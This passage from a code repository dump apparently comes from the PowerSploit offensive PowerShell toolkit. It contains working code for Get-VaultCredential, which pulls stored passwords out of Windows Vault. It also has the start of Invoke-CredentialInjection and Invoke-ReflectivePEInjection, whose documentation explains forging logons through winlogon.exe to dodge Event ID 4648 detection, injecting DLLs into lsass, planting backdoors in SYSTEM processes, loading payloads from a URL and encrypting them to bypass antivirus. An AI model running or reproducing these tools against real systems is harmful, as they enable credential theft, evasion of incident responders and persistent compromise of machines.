[Guid].MakeByRefType(),\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [IntPtr],\n                                                                     [Int32],\n                                                                     [IntPtr].MakeByRefType()),\n                                                          [Runtime.InteropServices.CallingConvention]::Winapi,\n                                                          [Runtime.InteropServices.CharSet]::Auto)\n    }\n\n    $Vaultcli = $TypeBuilder.CreateType()\n    #endregion\n\n    # Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct.\n    function local:Get-VaultElementValue\n    {\n        Param (\n            [ValidateScript({$_ -ne [IntPtr]::Zero})]\n            [IntPtr]\n            $VaultElementPtr\n        )\n\n        $PartialElement = [Runtime.InteropServices.Marshal]::PtrToStructure($VaultElementPtr, [Type] $VAULT_ITEM_ELEMENT)\n        $ElementPtr = [IntPtr] ($VaultElementPtr.ToInt64() + 16)\n\n        switch ($PartialElement.Type)\n        {\n            $VAULT_ELEMENT_TYPE::String {\n                $StringPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)\n                [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] $StringPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::Boolean {\n                [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::Short {\n                [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::UnsignedShort {\n                [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::Int {\n                [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::UnsignedInt {\n                [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr)\n            }\n\n            $VAULT_ELEMENT_TYPE::Double {\n                [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Double])\n            }\n\n            $VAULT_ELEMENT_TYPE::Guid {\n                [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid])\n            }\n\n            $VAULT_ELEMENT_TYPE::Sid {\n                $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)\n                Write-Verbose \"0x$($SidPtr.ToString('X8'))\"\n                $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr)\n                $SidObject.Value\n            }\n\n            # These elements are currently unimplemented.\n            # I have yet to see these used in practice.\n            $VAULT_ELEMENT_TYPE::ByteArray { $null }\n            $VAULT_ELEMENT_TYPE::TimeStamp { $null }\n            $VAULT_ELEMENT_TYPE::ProtectedArray { $null }\n            $VAULT_ELEMENT_TYPE::Attribute { $null }\n            $VAULT_ELEMENT_TYPE::Last { $null }\n        }\n    }\n\n    $VaultCount = 0\n    $VaultGuidPtr = [IntPtr]::Zero\n    $Result = $Vaultcli::VaultEnumerateVaults(0, [Ref] $VaultCount, [Ref] $VaultGuidPtr)\n\n    if ($Result -ne 0)\n    {\n        throw \"Unable to enumerate vaults. Error (0x$($Result.ToString('X8')))\"\n    }\n\n    $GuidAddress = $VaultGuidPtr\n\n    $VaultSchema = @{\n        ([Guid] '2F1A6504-0641-44CF-8BB5-3612D865F2E5') = 'Windows Secure Note'\n        ([Guid] '3CCD5499-87A8-4B10-A215-608888DD3B55') = 'Windows Web Password Credential'\n        ([Guid] '154E23D0-C644-4E6F-8CE6-5069272F999F') = 'Windows Credential Picker Protector'\n        ([Guid] '4BF4C442-9B8A-41A0-B380-DD4A704DDB28') = 'Web Credentials'\n        ([Guid] '77BC582B-F0A6-4E15-4E80-61736B6F3B29') = 'Windows Credentials'\n        ([Guid] 'E69D7838-91B5-4FC9-89D5-230D4D4CC2BC') = 'Windows Domain Certificate Credential'\n        ([Guid] '3E0E35BE-1B77-43E7-B873-AED901B6275B') = 'Windows Domain Password Credential'\n        ([Guid] '3C886FF3-2669-4AA2-A8FB-3F6759A77548') = 'Windows Extended Credential'\n        ([Guid] '00000000-0000-0000-0000-000000000000') = $null\n    }\n\n    if ($VaultCount)\n    {\n        foreach ($i in 1..$VaultCount)\n        {\n            $VaultGuid = [Runtime.InteropServices.Marshal]::PtrToStructure($GuidAddress, [Type] [Guid])\n            $GuidAddress = [IntPtr] ($GuidAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid]))\n\n            $VaultHandle = [IntPtr]::Zero\n\n            Write-Verbose \"Opening vault - $($VaultSchema[$VaultGuid]) ($($VaultGuid))\"\n\n            $Result = $Vaultcli::VaultOpenVault([Ref] $VaultGuid, 0, [Ref] $VaultHandle)\n\n            if ($Result -ne 0)\n            {\n                Write-Error \"Unable to open the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))\"\n                continue\n            }\n\n            $VaultItemCount = 0\n            $VaultItemPtr = [IntPtr]::Zero\n\n            $Result = $Vaultcli::VaultEnumerateItems($VaultHandle, 512, [Ref] $VaultItemCount, [Ref] $VaultItemPtr)\n\n            if ($Result -ne 0)\n            {\n                $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)\n                Write-Error \"Unable to enumerate vault items from the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))\"\n                continue\n            }\n\n            $StructAddress = $VaultItemPtr\n\n            if ($VaultItemCount)\n            {\n                foreach ($j in 1..$VaultItemCount)\n                {\n                    $CurrentItem = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $VAULT_ITEM)\n                    $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $VAULT_ITEM))\n\n                    $PasswordVaultItem = [IntPtr]::Zero\n\n                    if ($OSVersion -ge '6.2')\n                    {\n                        $Result = $Vaultcli::VaultGetItem($VaultHandle,\n                                                          [Ref] $CurrentItem.SchemaId,\n                                                          $CurrentItem.pResourceElement,\n                                                          $CurrentItem.pIdentityElement,\n                                                          $CurrentItem.pPackageSid,\n                                                          [IntPtr]::Zero,\n                                                          0,\n                                                          [Ref] $PasswordVaultItem)\n                    }\n                    else\n                    {\n                        $Result = $Vaultcli::VaultGetItem($VaultHandle,\n                                                          [Ref] $CurrentItem.SchemaId,\n                                                          $CurrentItem.pResourceElement,\n                                                          $CurrentItem.pIdentityElement,\n                                                          [IntPtr]::Zero,\n                                                          0,\n                                                          [Ref] $PasswordVaultItem)\n                    }\n\n                    $PasswordItem = $null\n\n                    if ($Result -ne 0)\n                    {\n                        Write-Error \"Error occured retrieving vault item. Error (0x$($Result.ToString('X8')))\"\n                        continue\n                    }\n                    else\n                    {\n                        $PasswordItem = [Runtime.InteropServices.Marshal]::PtrToStructure($PasswordVaultItem, [Type] $VAULT_ITEM)\n                    }\n\n                    if ($VaultSchema.ContainsKey($VaultGuid))\n                    {\n                        $VaultType = $VaultSchema[$VaultGuid]\n                    }\n                    else\n                    {\n                        $VaultType = $VaultGuid\n                    }\n\n                    if ($PasswordItem.pAuthenticatorElement -ne [IntPtr]::Zero)\n                    {\n                        $Credential = Get-VaultElementValue $PasswordItem.pAuthenticatorElement\n                    }\n                    else\n                    {\n                        $Credential = $null\n                    }\n\n                    $PackageSid = $null\n\n                    if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero))\n                    {\n                        $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid\n                    }\n\n\n                    $Properties = @{\n                        Vault = $VaultType\n                        Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null }\n                        Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null }\n                        PackageSid = $PackageSid\n                        Credential = $Credential\n                        LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified)\n                    }\n\n                    $VaultItem = New-Object PSObject -Property $Properties\n                    $VaultItem.PSObject.TypeNames[0] = 'VAULTCLI.VAULTITEM'\n\n                    $VaultItem\n\n                    $null = $Vaultcli::VaultFree($PasswordVaultItem)\n                }\n            }\n\n            $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle)\n        }\n    }\n}\n"
  },
  {
    "path": "Exfiltration/Get-VaultCredential.ps1xml",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<Configuration>\n    <ViewDefinitions>\n        <View>\n            <Name>VaultItemView</Name>\n                <ViewSelectedBy>\n\t\t            <TypeName>VAULTCLI.VAULTITEM</TypeName>\n\t\t        </ViewSelectedBy>\n            <ListControl>\n                <ListEntries>\n                    <ListEntry>\n                        <ListItems>\n                            <ListItem>\n                                <PropertyName>Vault</PropertyName>\n                            </ListItem>\n                            <ListItem>\n                                <PropertyName>Resource</PropertyName>\n                            </ListItem>\n                            <ListItem>\n                                <PropertyName>Identity</PropertyName>\n                            </ListItem>\n                            <ListItem>\n                                <PropertyName>Credential</PropertyName>\n                            </ListItem>\n                            <ListItem>\n                                <PropertyName>PackageSid</PropertyName>\n                            </ListItem>\n                            <ListItem>\n                                <PropertyName>LastModified</PropertyName>\n                            </ListItem>\n                        </ListItems>\n                    </ListEntry>\n                </ListEntries>\n            </ListControl>\n        </View>\n    </ViewDefinitions>\n</Configuration>\n"
  },
  {
    "path": "Exfiltration/Invoke-CredentialInjection.ps1",
    "content": "function Invoke-CredentialInjection\n{\n    <#\n    .SYNOPSIS\n\n    This script allows an attacker to create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).\n    The script either creates a suspended winlogon.exe process running as SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL in to \n    winlogon.exe which calls LsaLogonUser to create a logon from within winlogon.exe (which is where it is called from when a user logs in using RDP or \n    logs on locally). The injected DLL then impersonates the new logon token with its current thread so that it can be kidnapped using Invoke-TokenManipulation.\n\n    PowerSploit Function: Invoke-CredentialInjection\n    Author: Joe Bialek, Twitter: @JosephBialek\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n\n    .DESCRIPTION\n\n    This script allows an attacker to create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).\n    The script either creates a suspended winlogon.exe process running as SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL in to \n    winlogon.exe which calls LsaLogonUser to create a logon from within winlogon.exe (which is where it is called from when a user logs in using RDP or \n    logs on locally). The injected DLL then impersonates the new logon token with its current thread so that it can be kidnapped using Invoke-TokenManipulation.\n\n    .PARAMETER NewWinLogon\n\n    Switch. Specifies that this script should create a new WinLogon.exe process. This may be suspicious, as log correlation can show winlogon.exe was \n    created by PowerShell.exe. This CANNOT be used if the script is run from Session 0 (winlogon requires a desktop is available, and session 0 doesn't have one).\n\n    .PARAMETER ExistingWinLogon\n\n    Switch. Specifies that this script should use an existing WinLogon.exe process. This will leave behind code (a reflectively loaded DLL) in the process.\n\n    .PARAMETER DomainName\n\n    The domain name of the user account.\n\n    .PARAMETER UserName\n\n    The username to log in with.\n\n    .PARAMETER Password\n\n    The password of the user.\n\n    .PARAMETER LogonType\n\n    The logon type of the injected logon. Can be Interactive, RemoteInteractive, or NetworkCleartext\n\n    .PARAMETER AuthPackage\n\n    The authentication package to use. Default is Kerberos. Msv1_0 can be specified but should only be used for local accounts (which can't use kerberos).\n\n\t\n    .EXAMPLE\n\n    Invoke-CredentialInjection -DomainName \"demo\" -UserName \"administrator\" -Password \"Password1\" -NewWinLogon\n\n    Creates a new winlogon process (as the SYSTEM account) and creates a logon from within the process as demo\\administrator. The logon will default to\n    RemoteInteractive (an RDP logon). Defaults to using the Kerberos provider.\n\n    .EXAMPLE\n\n    Invoke-CredentialInjection -DomainName \"demo\" -UserName \"administrator\" -Password \"Password1\" -ExistingWinLogon -LogonType NetworkCleartext\n\n    Uses an existing winlogon process and creates a loogn from within it as demo\\administrator. The logon will be type NetworkCleartext (used in basic auth\n    and PowerShell w/ CredSSP). Defaults to using the Kerberos provider.\n\n    .EXAMPLE\n\n    Invoke-CredentialInjection -DomainName \"demo\" -UserName \"administrator\" -Password \"Password1\" -NewWinLogon -AuthPackage Msv1_0\n\n    Creates a new winlogon process (as the SYSTEM account) and creates a logon from within the process as demo\\administrator. The logon will default to \n    RemoteInteractive (and RDP logon). The logon will use the Msv1_0 auth package (NTLM).\n\n    .NOTES\n    Normally when you do a RunAS logon, the EventID 4648 will show your current account, current process, and the account you are logging in with.\n    Incident responders use this to look for lateral movement. They can see a random user logging in with high privilege credentials, which stands out.\n    This script allows you to create the logon from within winlogon.exe, as SYSTEM. This allows you to create 4648 event logs which make it appear that the\n    user logged in using RDP or logged in locally, rather than the logon showing up as a suspicious RunAS. Then you can use token kidnapping, such as the\n    Invoke-TokenManipulation script to kidnap the security token. This token can then be used to authenticate over the network for pivoting and other post\n    exploitation.\n\n    .LINK\n\n    Blog: http://clymb3r.wordpress.com/\n    Github repo: https://github.com/clymb3r/PowerShell\n\n    #>\n\n    [CmdletBinding()]\n    Param(\n        [Parameter(ParameterSetName = \"NewWinLogon\", Position = 0)]\n\t    [Switch]\n\t    $NewWinLogon,\n\n        [Parameter(ParameterSetName = \"ExistingWinLogon\", Position = 0)]\n\t    [Switch]\n\t    $ExistingWinLogon,\n\n        [Parameter(Position=1, Mandatory=$true)]\n        [String]\n        $DomainName,\n\n        [Parameter(Position=2, Mandatory=$true)]\n        [String]\n        $UserName,\n\n        [Parameter(Position=3, Mandatory=$true)]\n        [String]\n        $Password,\n\n        [Parameter()]\n        [ValidateSet(\"Interactive\",\"RemoteInteractive\", \"NetworkCleartext\")]\n        [String]\n        $LogonType = \"RemoteInteractive\",\n\n        [Parameter()]\n        [ValidateSet(\"Kerberos\",\"Msv1_0\")]\n        [String]\n        $AuthPackage = \"Kerberos\"\n    )\n\n    Set-StrictMode -Version 2\n\n\n\n\n    function Invoke-ReflectivePEInjection\n    {\n    <#\n    .SYNOPSIS\n\n    This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, \n    or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, \n    please lead the Notes section (GENERAL NOTES) for information on how to use them.\n\n\n    1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.\n    Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process.\n\n    This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system,\n    this will load and execute the DLL/EXE in to memory without writing any files to disk.\n\n\n    2.) Reflectively load a DLL in to memory of a remote process.\n    As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process.\n\n    This is probably most useful for injecting backdoors in SYSTEM processes in Session0. Currently, you cannot retrieve output\n    from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the \n    remote process. \n\n\n    While this script provides functionality to specify a file to load from disk or from a URL, these are more for demo purposes. The way I'd recommend using the script is to create a byte array\n    containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will\n    bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba\n    blog linked below (thanks to whitey).\n\n    PowerSploit Function: Invoke-ReflectivePEInjection\n    Author: Joe Bialek, Twitter: @JosephBialek\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n    Version: 1.1\n\n    .DESCRIPTION\n\n    Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.\n\n    .PARAMETER PEPath\n\n    The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer.\n\n    .PARAMETER PEUrl\n\n    A URL containing a DLL/EXE to load and execute.\n\n    .PARAMETER ComputerName\n\n    Optional, an array of computernames to run the script on.\n\n    .PARAMETER FuncReturnType\n\n    Optional, the return type of the function being called in the DLL. Default: Void\n\t    Options: String, WString, Void. See notes for more information.\n\t    IMPORTANT: For DLLs being loaded remotely, only Void is supported.\n\t\n    .PARAMETER ExeArgs\n\n    Optional, arguments to pass to the executable being reflectively loaded.\n\t\n    .PARAMETER ProcName\n\n    Optional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.\n\n    .PARAMETER ProcId\n\n    Optional, the process ID of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.\n\t\n    .EXAMPLE\n\n    Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc().\n    Note that the file name on the website can be any file extension.\n    Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString\n\n    .EXAMPLE\n\n    Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().\n    Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local\n\n    .EXAMPLE\n\n    Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print\n\t    the wchar_t* returned by WStringFunc() from all the computers.\n    Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)\n\n    .EXAMPLE\n\n    Load DemoEXE and run it locally.\n    Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs \"Arg1 Arg2 Arg3 Arg4\"\n\n    .EXAMPLE\n\n    Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.\n    Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local\n\n    .NOTES\n    GENERAL NOTES:\n    The script has 3 basic sets of functionality:\n    1.) Reflectively load a DLL in to the PowerShell process\n\t    -Can return DLL output to user when run remotely or locally.\n\t    -Cleans up memory in the PS process once the DLL finishes executing.\n\t    -Great for running pentest tools on remote computers without triggering process monitoring alerts.\n\t    -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.\n    2.) Reflectively load an EXE in to the PowerShell process.\n\t    -Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally.\n\t    -Cleans up memory in the PS process once the DLL finishes executing.\n\t    -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.\n    3.) Reflectively inject a DLL in to a remote process.\n\t    -Can NOT return DLL output to the user when run remotely OR locally.\n\t    -Does NOT clean up memory in the remote process if/when DLL finishes execution.\n\t    -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.\n\t    -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded.\n\n\n\n    DLL LOADING NOTES:\n\n    PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output.\n    If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL\n    return a char* or wchar_t*, which PowerShell can take and read the output from. Anything output from stdout which is run using powershell\n    remoting will not be returned to you. If you just run the PowerShell script locally, you WILL be able to see the stdout output from\n    applications because it will just appear in the console window. The limitation only applies when using PowerShell remoting.\n\n    For DLL Loading:\n    Once this script loads the DLL, it calls a function in the DLL. There is a section near the bottom labeled \"YOUR CODE GOES HERE\"\n    I recommend your DLL take no parameters. I have prewritten code to handle functions which take no parameters are return\n    the following types: char*, wchar_t*, and void. If the function returns char* or wchar_t* the script will output the\n    returned data. The FuncReturnType parameter can be used to specify which return type to use. The mapping is as follows:\n    wchar_t*   : FuncReturnType = WString\n    char*      : FuncReturnType = String\n    void       : Default, don't supply a FuncReturnType\n\n    For the whcar_t* and char_t* options to work, you must allocate the string to the heap. Don't simply convert a string\n    using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns.\n\n    The function name expected in the DLL for the prewritten FuncReturnType's is as follows:\n    WString    : WStringFunc\n    String     : StringFunc\n    Void       : VoidFunc\n\n    These function names ARE case sensitive. To create an exported DLL function for the wstring type, the function would\n    be declared as follows:\n    extern \"C\" __declspec( dllexport ) wchar_t* WStringFunc()\n\n\n    If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify\n    this script to accomodate this. You can find the code to modify in the section labeled \"YOUR CODE GOES HERE\".\n\n    Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection\n\n    .LINK\n\n    Blog: http://clymb3r.wordpress.com/\n    Github repo: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection\n\n    Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/\n    Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/\n    Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/\n\n    #>\n\n    [CmdletBinding()]\n    Param(\n\t    [Parameter(Mandatory = $true)]\n\t    [Byte[]]\n\t    $Bytes32,\n\t\n\t    [Parameter(Mandatory = $true)]\n\t    [Byte[]]\n\t    $Bytes64,\n\t\n\t    [Parameter(Position = 1)]\n\t    [String[]]\n\t    $ComputerName,\n\t\n\t    [Parameter(Position = 2)]\n        [ValidateSet( 'WString', 'String', 'Void' )]\n\t    [String]\n\t    $FuncReturnType = 'Void',\n\t\n\t    [Parameter(Position = 3)]\n\t    [String]\n\t    $ExeArgs,\n\t\n\t    [Parameter(Position = 4)]\n\t    [Int32]\n\t    $ProcId,\n\t\n\t    [Parameter(Position = 5)]\n\t    [String]\n\t    $ProcName\n    )\n\n    Set-StrictMode -Version 2\n\n\n    $RemoteScriptBlock = {\n\t    [CmdletBinding()]\n\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [Byte[]]\n\t\t    $PEBytes,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $false)]\n\t\t    [String]\n\t\t    $FuncReturnType,\n\t\t\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $false)]\n\t\t    [Int32]\n\t\t    $ProcId,\n\t\t\n\t\t    [Parameter(Position = 3, Mandatory = $false)]\n\t\t    [String]\n\t\t    $ProcName\n\t    )\n\t\n\t    ###################################\n\t    ##########  Win32 Stuff  ##########\n\t    ###################################\n\t    Function Get-Win32Types\n\t    {\n\t\t    $Win32Types = New-Object System.Object\n\n\t\t    #Define all the structures/enums that will be used\n\t\t    #\tThis article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html\n\t\t    $Domain = [AppDomain]::CurrentDomain\n\t\t    $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')\n\t\t    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t\t    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)\n\t\t    $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n\n\n\t\t    ############    ENUM    ############\n\t\t    #Enum MachineType\n\t\t    $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])\n\t\t    $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null\n\t\t    $MachineType = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType\n\n\t\t    #Enum MagicType\n\t\t    $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null\n\t\t    $MagicType = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType\n\n\t\t    #Enum SubSystemType\n\t\t    $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null\n\t\t    $SubSystemType = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType\n\n\t\t    #Enum DllCharacteristicsType\n\t\t    $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])\n\t\t    $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null\n\t\t    $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null\n\t\t    $DllCharacteristicsType = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType\n\n\t\t    ###########    STRUCT    ###########\n\t\t    #Struct IMAGE_DATA_DIRECTORY\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)\n\t\t    ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t    $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY\n\n\t\t    #Struct IMAGE_FILE_HEADER\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)\n\t\t    $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null\n\t\t    $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value 